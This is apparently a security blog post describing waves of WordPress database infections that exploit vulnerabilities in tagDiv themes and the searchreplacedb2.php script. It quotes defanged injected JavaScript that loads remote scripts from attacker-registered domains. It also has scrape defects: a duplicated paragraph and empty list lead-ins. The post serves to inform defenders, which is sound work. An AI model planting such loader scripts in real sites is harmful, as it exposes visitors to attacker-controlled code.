<p>Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).</p><p>Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).</p>
The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.
Typical injected scripts look like this:
<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>
Or:
var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);</p>
Or:
</p>The most noticeable malicious URLs that we’ve seen lately are:
They are all new domains registered specifically for this attack:
Malware in WordPress Database
In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!